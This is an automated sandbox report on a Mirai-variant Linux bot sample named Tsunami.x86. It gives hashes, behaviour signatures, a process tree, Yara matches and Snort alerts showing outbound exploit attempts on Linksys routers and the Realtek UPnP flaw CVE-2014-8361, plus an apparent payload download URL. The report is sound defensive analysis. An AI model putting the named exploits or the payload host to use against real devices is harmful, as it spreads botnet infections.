Joe Sandbox Cloud Basic Analysis Report
Create Interactive Tour

Linux Analysis Report Tsunami.x86

Overview

General Information

Sample Name:Tsunami.x86
Analysis ID:512552
MD5:eeff9245e700bd5a5ad66e2b7da182e0
SHA1:4fc227c03eadaabb350fa2fffdf84ec47d707fb9
SHA256:35c466355eb2680e17f3727da23d045ae0a6a1abca1032a33138cdeea20478bf
Infos:

Detection

Mirai
Score:88
Range:0 - 100
Whitelisted:false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample tries to kill many processes (SIGKILL)
Connects to many ports of the same IP (likely port scanning)
Reads system files that contain records of logged in users
Sample is packed with UPX
Uses known network protocols on non-standard ports
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample contains only a LOAD segment without any section mappings
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Executes the "grep" command used to find patterns in files or piped streams
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Deletes log files
Creates hidden files and/or directories
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:512552
Start date:01.11.2021
Start time:04:15:09
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 48s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:Tsunami.x86
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal88.spre.troj.evad.linX86@0/106@0/0
Warnings:
  • Connection to analysis system has been lost, crash info: Unknown
  • TCP Packets have been reduced to 100
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: http://23.94.37.59/zyxel.sh;

Process Tree

  • system is lnxubuntu20
  • systemd New Fork (PID: 5269, Parent: 1)
  • sshd (PID: 5269, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t
  • systemd New Fork (PID: 5272, Parent: 1)
  • sshd (PID: 5272, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D
  • systemd New Fork (PID: 5285, Parent: 1)
  • systemd-resolved (PID: 5285, Parent: 1, MD5: c93bbc5e20248114c56896451eab7a8b) Arguments: /lib/systemd/systemd-resolved
  • systemd New Fork (PID: 5572, Parent: 1)
  • systemd-logind (PID: 5572, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5709, Parent: 1)
  • accounts-daemon (PID: 5709, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 5724, Parent: 5709, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 5725, Parent: 5724, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 5726, Parent: 5725, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 5727, Parent: 5726)
          • locale (PID: 5727, Parent: 5726, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 5728, Parent: 5726)
          • grep (PID: 5728, Parent: 5726, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • rm (PID: 5712, Parent: 1900, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51
  • systemd New Fork (PID: 5713, Parent: 1860)
  • pulseaudio (PID: 5713, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • Default (PID: 5719, Parent: 1809, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PostSession/Default
  • gdm3 New Fork (PID: 5731, Parent: 1320)
  • gdm-session-worker (PID: 5731, Parent: 1320, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
    • gdm-x-session (PID: 5738, Parent: 5731, MD5: 498a824333f1c1ec7767f4612d1887cc) Arguments: /usr/lib/gdm3/gdm-x-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
      • Xorg (PID: 5742, Parent: 5738, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/bin/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
      • Xorg.wrap (PID: 5742, Parent: 5738, MD5: 48993830888200ecf19dd7def0884dfd) Arguments: /usr/lib/xorg/Xorg.wrap vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
      • Xorg (PID: 5742, Parent: 5738, MD5: 730cf4c45a7ee8bea88abf165463b7f8) Arguments: /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
        • Xorg New Fork (PID: 5773, Parent: 5742)
        • sh (PID: 5773, Parent: 5742, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""
          • sh New Fork (PID: 5774, Parent: 5773)
          • xkbcomp (PID: 5774, Parent: 5773, MD5: c5f953aec4c00d2a1cc27acb75d62c9b) Arguments: /usr/bin/xkbcomp -w 1 -R/usr/share/X11/xkb -xkm - -em1 "The XKEYBOARD keymap compiler (xkbcomp) reports:" -emp "> " -eml "Errors from xkbcomp are not fatal to the X server" /tmp/server-0.xkm
      • dbus-daemon (PID: 5795, Parent: 5738, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --print-address 4 --session
        • dbus-daemon New Fork (PID: 5797, Parent: 5795)
          • false (PID: 5798, Parent: 5797, MD5: 3177546c74e4f0062909eae43d948bfc) Arguments: /bin/false
  • gdm3 New Fork (PID: 5732, Parent: 1320)
  • Default (PID: 5732, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5733, Parent: 1320)
  • Default (PID: 5733, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5736, Parent: 1320)
  • Default (PID: 5736, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5801, Parent: 1320)
  • Default (PID: 5801, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5802, Parent: 1320)
  • Default (PID: 5802, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5854, Parent: 1)
  • sshd (PID: 5854, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t
  • systemd New Fork (PID: 5855, Parent: 1)
  • sshd (PID: 5855, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D
  • systemd New Fork (PID: 5858, Parent: 1)
  • systemd-resolved (PID: 5858, Parent: 1, MD5: c93bbc5e20248114c56896451eab7a8b) Arguments: /lib/systemd/systemd-resolved
  • systemd New Fork (PID: 6122, Parent: 1)
  • systemd-logind (PID: 6122, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • gdm3 New Fork (PID: 6239, Parent: 1320)
  • gdm-session-worker (PID: 6239, Parent: 1320, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
    • gdm-x-session (PID: 6256, Parent: 6239, MD5: 498a824333f1c1ec7767f4612d1887cc) Arguments: /usr/lib/gdm3/gdm-x-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
      • Xorg (PID: 6258, Parent: 6256, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/bin/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
      • Xorg.wrap (PID: 6258, Parent: 6256, MD5: 48993830888200ecf19dd7def0884dfd) Arguments: /usr/lib/xorg/Xorg.wrap vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
      • Xorg (PID: 6258, Parent: 6256, MD5: 730cf4c45a7ee8bea88abf165463b7f8) Arguments: /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
        • Xorg New Fork (PID: 6278, Parent: 6258)
        • sh (PID: 6278, Parent: 6258, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""
          • sh New Fork (PID: 6279, Parent: 6278)
          • xkbcomp (PID: 6279, Parent: 6278, MD5: c5f953aec4c00d2a1cc27acb75d62c9b) Arguments: /usr/bin/xkbcomp -w 1 -R/usr/share/X11/xkb -xkm - -em1 "The XKEYBOARD keymap compiler (xkbcomp) reports:" -emp "> " -eml "Errors from xkbcomp are not fatal to the X server" /tmp/server-0.xkm
      • dbus-daemon (PID: 6283, Parent: 6256, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --print-address 4 --session
        • dbus-daemon New Fork (PID: 6285, Parent: 6283)
          • false (PID: 6286, Parent: 6285, MD5: 3177546c74e4f0062909eae43d948bfc) Arguments: /bin/false
  • systemd New Fork (PID: 6242, Parent: 1)
  • accounts-daemon (PID: 6242, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 6246, Parent: 6242, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 6247, Parent: 6246, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 6248, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 6251, Parent: 6248)
          • locale (PID: 6251, Parent: 6248, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 6252, Parent: 6248)
          • grep (PID: 6252, Parent: 6248, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • systemd New Fork (PID: 6254, Parent: 1)
  • systemd (PID: 6254, Parent: 1, MD5: 9b2bec7092a40488108543f9334aab75) Arguments: /lib/systemd/systemd --user
    • systemd New Fork (PID: 6259, Parent: 6254)
      • systemd New Fork (PID: 6260, Parent: 6259)
      • 30-systemd-environment-d-generator (PID: 6260, Parent: 6259, MD5: 42417da8051ba8ee0eea7854c62d99ca) Arguments: /usr/lib/systemd/user-environment-generators/30-systemd-environment-d-generator
    • systemd New Fork (PID: 6265, Parent: 6254)
    • systemctl (PID: 6265, Parent: 6254, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /bin/systemctl --user set-environment DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/127/bus
    • systemd New Fork (PID: 6268, Parent: 6254)
    • pulseaudio (PID: 6268, Parent: 6254, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • gdm3 New Fork (PID: 6290, Parent: 1320)
  • Default (PID: 6290, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6291, Parent: 1320)
  • Default (PID: 6291, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 6311, Parent: 1)
  • sshd (PID: 6311, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t
  • systemd New Fork (PID: 6312, Parent: 1)
  • sshd (PID: 6312, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D
  • systemd New Fork (PID: 6315, Parent: 1)
  • systemd-resolved (PID: 6315, Parent: 1, MD5: c93bbc5e20248114c56896451eab7a8b) Arguments: /lib/systemd/systemd-resolved
  • systemd New Fork (PID: 6583, Parent: 1)
  • systemd-logind (PID: 6583, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 6700, Parent: 1)
  • accounts-daemon (PID: 6700, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 6704, Parent: 6700, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 6705, Parent: 6704, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 6706, Parent: 6705, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 6707, Parent: 6706)
          • locale (PID: 6707, Parent: 6706, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 6708, Parent: 6706)
          • grep (PID: 6708, Parent: 6706, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • gdm3 New Fork (PID: 6709, Parent: 1320)
  • gdm-session-worker (PID: 6709, Parent: 1320, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
    • gdm-x-session (PID: 6717, Parent: 6709, MD5: 498a824333f1c1ec7767f4612d1887cc) Arguments: /usr/lib/gdm3/gdm-x-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
      • Xorg (PID: 6719, Parent: 6717, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/bin/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
      • Xorg.wrap (PID: 6719, Parent: 6717, MD5: 48993830888200ecf19dd7def0884dfd) Arguments: /usr/lib/xorg/Xorg.wrap vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
      • Xorg (PID: 6719, Parent: 6717, MD5: 730cf4c45a7ee8bea88abf165463b7f8) Arguments: /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
        • Xorg New Fork (PID: 7533, Parent: 6719)
        • sh (PID: 7533, Parent: 6719, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""
          • sh New Fork (PID: 7534, Parent: 7533)
          • xkbcomp (PID: 7534, Parent: 7533, MD5: c5f953aec4c00d2a1cc27acb75d62c9b) Arguments: /usr/bin/xkbcomp -w 1 -R/usr/share/X11/xkb -xkm - -em1 "The XKEYBOARD keymap compiler (xkbcomp) reports:" -emp "> " -eml "Errors from xkbcomp are not fatal to the X server" /tmp/server-0.xkm
      • dbus-daemon (PID: 7540, Parent: 6717, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --print-address 4 --session
        • dbus-daemon New Fork (PID: 7542, Parent: 7540)
          • false (PID: 7543, Parent: 7542, MD5: 3177546c74e4f0062909eae43d948bfc) Arguments: /bin/false
  • systemd New Fork (PID: 6715, Parent: 1)
  • systemd (PID: 6715, Parent: 1, MD5: 9b2bec7092a40488108543f9334aab75) Arguments: /lib/systemd/systemd --user
    • systemd New Fork (PID: 6720, Parent: 6715)
      • systemd New Fork (PID: 6721, Parent: 6720)
      • 30-systemd-environment-d-generator (PID: 6721, Parent: 6720, MD5: 42417da8051ba8ee0eea7854c62d99ca) Arguments: /usr/lib/systemd/user-environment-generators/30-systemd-environment-d-generator
  • systemd New Fork (PID: 6728, Parent: 1)
  • sshd (PID: 6728, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t
  • systemd New Fork (PID: 6731, Parent: 1)
  • systemd-resolved (PID: 6731, Parent: 1, MD5: c93bbc5e20248114c56896451eab7a8b) Arguments: /lib/systemd/systemd-resolved
  • systemd New Fork (PID: 6992, Parent: 1)
  • sshd (PID: 6992, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D
  • systemd New Fork (PID: 6997, Parent: 1)
  • systemd-logind (PID: 6997, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • gdm3 New Fork (PID: 7116, Parent: 1320)
  • Default (PID: 7116, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 7117, Parent: 1320)
  • Default (PID: 7117, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 7118, Parent: 1)
  • accounts-daemon (PID: 7118, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 7122, Parent: 7118, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 7123, Parent: 7122, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 7124, Parent: 7123, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 7125, Parent: 7124)
          • locale (PID: 7125, Parent: 7124, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 7126, Parent: 7124)
          • grep (PID: 7126, Parent: 7124, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • gdm3 New Fork (PID: 7129, Parent: 1320)
  • gdm-session-worker (PID: 7129, Parent: 1320, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
  • systemd New Fork (PID: 7135, Parent: 1)
  • systemd (PID: 7135, Parent: 1, MD5: 9b2bec7092a40488108543f9334aab75) Arguments: /lib/systemd/systemd --user
    • systemd New Fork (PID: 7137, Parent: 7135)
      • systemd New Fork (PID: 7138, Parent: 7137)
      • 30-systemd-environment-d-generator (PID: 7138, Parent: 7137, MD5: 42417da8051ba8ee0eea7854c62d99ca) Arguments: /usr/lib/systemd/user-environment-generators/30-systemd-environment-d-generator
  • systemd New Fork (PID: 7143, Parent: 1)
  • systemd-resolved (PID: 7143, Parent: 1, MD5: c93bbc5e20248114c56896451eab7a8b) Arguments: /lib/systemd/systemd-resolved
  • systemd New Fork (PID: 7404, Parent: 1)
  • sshd (PID: 7404, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t
  • systemd New Fork (PID: 7407, Parent: 1)
  • sshd (PID: 7407, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D
  • systemd New Fork (PID: 7410, Parent: 1)
  • systemd-logind (PID: 7410, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • gdm3 New Fork (PID: 7527, Parent: 1320)
  • Default (PID: 7527, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 7528, Parent: 1320)
  • Default (PID: 7528, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • cleanup

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
5246.1.0000000081fd3d8d.00000000664d72ba.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x3e0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x440:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x4e8:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
5244.1.0000000081fd3d8d.00000000664d72ba.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x3e0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x440:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x4e8:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
5244.1.000000001a887bdc.00000000934a2024.r-x.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0xf6ec:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0xf748:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0xf7e4:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
5244.1.000000001a887bdc.00000000934a2024.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    5246.1.000000001a887bdc.00000000934a2024.r-x.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
    • 0xf6ec:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
    • 0xf748:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
    • 0xf7e4:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
    Click to see the 1 entries

    Jbx Signature Overview

    • AV Detection
    • Bitcoin Miner
    • Networking
    • System Summary
    • Data Obfuscation
    • Persistence and Installation Behavior
    • Hooking and other Techniques for Hiding and Protection
    • Malware Analysis System Evasion
    • Language, Device and Operating System Detection
    • Stealing of Sensitive Information
    • Remote Access Functionality

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted file
    Source: Tsunami.x86Virustotal: Detection: 32%Perma Link
    Source: Tsunami.x86ReversingLabs: Detection: 33%
    Source: /usr/bin/pulseaudio (PID: 5713)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/lib/xorg/Xorg (PID: 5742)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/lib/xorg/Xorg (PID: 6258)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/lib/xorg/Xorg (PID: 6719)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:38292 -> 172.65.108.228:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:38292 -> 172.65.108.228:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:38292 -> 172.65.108.228:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:49558 -> 172.65.1.164:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49558 -> 172.65.1.164:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:49558 -> 172.65.1.164:55555
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.96.205:80 -> 192.168.2.23:55474
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55474 -> 95.101.96.205:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.9.171:80 -> 192.168.2.23:44626
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40850 -> 88.123.249.213:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51832 -> 88.135.38.130:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34206 -> 112.104.66.123:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50234 -> 156.238.15.88:52869
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.160.170:8080 -> 192.168.2.23:58354
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.9.171:80 -> 192.168.2.23:44696
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55738 -> 172.65.31.223:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55738 -> 172.65.31.223:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:55738 -> 172.65.31.223:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48252 -> 172.65.229.144:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48252 -> 172.65.229.144:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:48252 -> 172.65.229.144:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:37442 -> 172.65.247.29:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37442 -> 172.65.247.29:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:37442 -> 172.65.247.29:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35678 -> 172.65.178.177:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35678 -> 172.65.178.177:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:35678 -> 172.65.178.177:55555
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.103.125.250:8080 -> 192.168.2.23:56240
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:43132 -> 172.65.166.137:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:43132 -> 172.65.166.137:55555
